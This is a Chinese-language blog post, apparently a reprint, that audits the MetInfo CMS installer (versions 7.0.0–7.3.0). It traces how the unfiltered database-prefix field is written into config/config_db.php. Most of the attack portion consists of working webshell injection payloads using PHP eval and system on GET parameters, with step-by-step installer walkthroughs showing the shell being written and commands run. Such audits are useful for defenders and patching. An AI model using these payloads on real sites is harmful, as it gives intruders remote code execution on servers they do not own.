米拓建站系统1day审计与利用(米拓建站侵权)

Metinfocms命令执行

前话:

米拓企业建站系统是一款由长沙某公司自主研发的免费开源企业级CMS,该系统拥有大量的用户使用,及对该款cms进行审计,如果利用CNVD-2021-01930进行进一步深入,其危害的严重性可想而知。

审计过程:

1.Index:拿到源码先看根目录的index.php看看都包含(加载)了什么文件。

图片[1]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

2.关键词:在/app/system/entrance.php看到了配置文件的定义,全局搜索这’PATH_CONFIG‘参数。

图片[2]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

全局搜索并找到install/index.php文件下有这个参数,点击跟进查看。

图片[3]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

在这个文件的219行有个是接收db数据库参数的方法。

官方说明“$_M”数组:
https://doc.metinfo.cn/dev/basics/basics75.html

这里是接收from数据的db_prefix参数。也就是“数据表前缀”内容的值。

图片[4]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

往下发现是直接写入tableper然后赋值给config变量。

图片[5]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

并在264行fopen打开/config/config_db.php进行没有安全过滤的字节流(fputs)方式的写入。

图片[6]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

影响版本:7.3.0- 7.0.0

一、进行7.3.0安装步骤,访问http://127.0.0.1/install/index.php

图片[7]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

二、选中传统安装继续下一步

图片[8]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[9]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

三、数据库信息进行写shell

代码执行Payload:"*/@eval($_GET['1']);/*

命令执行Payload:"*/@system($_GET['1']);/*

代码执行:

图片[10]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[11]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

点击保存进行下一步验证,出现这报错信息,可以查看configconfig_db.php文件。

图片[12]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[13]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker成功写入

图片[14]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

命令执行:

图片[15]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[16]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[17]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

7.0.0版本:

 

图片[18]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[19]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker图片[20]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker图片[21]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker7.1.0版本:

Payload:"*/@eval($_GET['1']);@system($_GET['2']);/*

 

图片[22]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[23]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[24]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker图片[25]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker7.2.0版本:

Payload:"*/@eval($_GET['1']);@system($_GET['2']);/*

图片[26]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[27]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[28]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

图片[29]-米拓建站系统1day审计与利用(米拓建站侵权)-Pikachu Hacker

推荐实操:MetInfo SQL注入 

https://www.hetianlab.com/expc.do?ec=ECID269f-6dc2-4412-bbad-a27109b207cf&pk_campaign=weixin-wemedia#stu  

通过该实验掌握MetInfo SQL注入漏洞的原因和利用方法,以及如何修复该漏洞。

本文作者:蚁景网安实验室

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/161903.html

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容